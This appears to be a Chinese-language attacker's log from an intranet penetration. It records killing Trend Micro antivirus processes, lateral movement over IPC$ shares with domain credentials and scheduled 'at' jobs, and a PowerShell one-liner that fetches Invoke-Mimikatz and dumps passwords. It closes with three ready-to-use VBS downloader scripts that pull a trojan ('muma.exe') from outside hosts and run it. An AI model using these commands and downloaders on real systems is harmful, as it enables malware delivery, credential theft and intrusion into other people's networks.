某内网纪实

渗透总结：

环境为172段，拿到shell，补丁全打，站库分离，360分分钟教我做人，上了个大马，net一套命令下来，有域，恰好库在域这个段，此时我想通过mssql执行cmdshell种马(其实通过mssql已经拿到几台服务器了。但是感觉用shell去访问不行)

vbs下载者,bitsadmin下载，ipc链接copy过去,

1.bitsadmin /rawreturn /transfer getfile http://download.sysinternals.com/files/PSTools.zip c:p.zip  win03下没有，拷贝win7过去不能使用。

2.vbs下载者 我echo执行所有命令，发现执行超时。趋势科技防火墙，我用system权限，taskkill /f /t /im pid结束进程，结果关闭掉了mssql进程（手误）

大概有四个进程：

NTRtScan.exe 1964 ntrtscan
PccNTMon.exe 3924 暂缺
CNTAoSMgr.exe 296 暂缺
PccNTMon.exe 5452 暂缺

ipc net use \10.1.111.1c$ "dcusername" /user:"password" 

copy pathxx.exe \10.xxxxc$xx.exe 

net time \ip

at time \ipC$x.exe  (典型的手法）

接下来的思路：

查看shell进行提权，溢出，mssql,ftp,收集更多的信息，比如mail等

确定控下的这两天内网机器是否存在web,如果是这样就很轻松了。

msf+cobalt strike+veil提权看看

 powershell 抓密码：

powershell "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds > C:programdatapass.txt"

 执行命令：psexec

https://technet.microsoft.com/en-us/sysinternals/bb897553

https://github.com/nick-o/impacket

vbs下载三种版本：

一、VBS下载者：

Set Post = CreateObject("Msxml2.XMLHTTP")
Set Shell = CreateObject("Wscript.Shell")
Post.Open "GET","http://www.03389.com/muma.exe",0
Post.Send()
Set aGet = CreateObject("ADODB.Stream")
aGet.Mode = 3
aGet.Type = 1
aGet.Open()
aGet.Write(Post.responseBody)
aGet.SaveToFile "c:zl.exe",2
wscript.sleep 1000
Shell.Run ("c:zl.exe") '延迟过后执行下载文件


二、cmd下执行的版本：

echo Set Post = CreateObject("Msxml2.XMLHTTP") >>zl.vbs
echo Set Shell = CreateObject("Wscript.Shell") >>zl.vbs
echo Post.Open "GET","http://www.03389.com/muma.exe",0 >>zl.vbs
echo Post.Send() >>zl.vbs
echo Set aGet = CreateObject("ADODB.Stream") >>zl.vbs
echo aGet.Mode = 3 >>zl.vbs
echo aGet.Type = 1 >>zl.vbs
echo aGet.Open() >>zl.vbs
echo aGet.Write(Post.responseBody) >>zl.vbs
echo aGet.SaveToFile "c:zl.exe",2 >>zl.vbs
echo wscript.sleep 1000 >>zl.vbs
echo Shell.Run ("c:zl.exe") >>zl.vbs

三、wget.vbs

on error resume next
iLocal=LCase(Wscript.Arguments(1))
iRemote=LCase(Wscript.Arguments(0))
iUser=LCase(Wscript.Arguments(2))
iPass=LCase(Wscript.Arguments(3))
set xPost=CreateObject("Microsoft.XMLHTTP")
if iUser="" and iPass="" then
xPost.Open "GET",iRemote,0
else
xPost.Open "GET",iRemote,0,iUser,iPass
end if
xPost.Send()
set sGet=CreateObject("ADODB.Stream")
sGet.Mode=3
sGet.Type=1
sGet.Open()
sGet.Write xPost.ResponseBody
sGet.SaveToFile iLocal,2

使用方法：cscript wget.vbs http://www.moonsec.com/muma.exe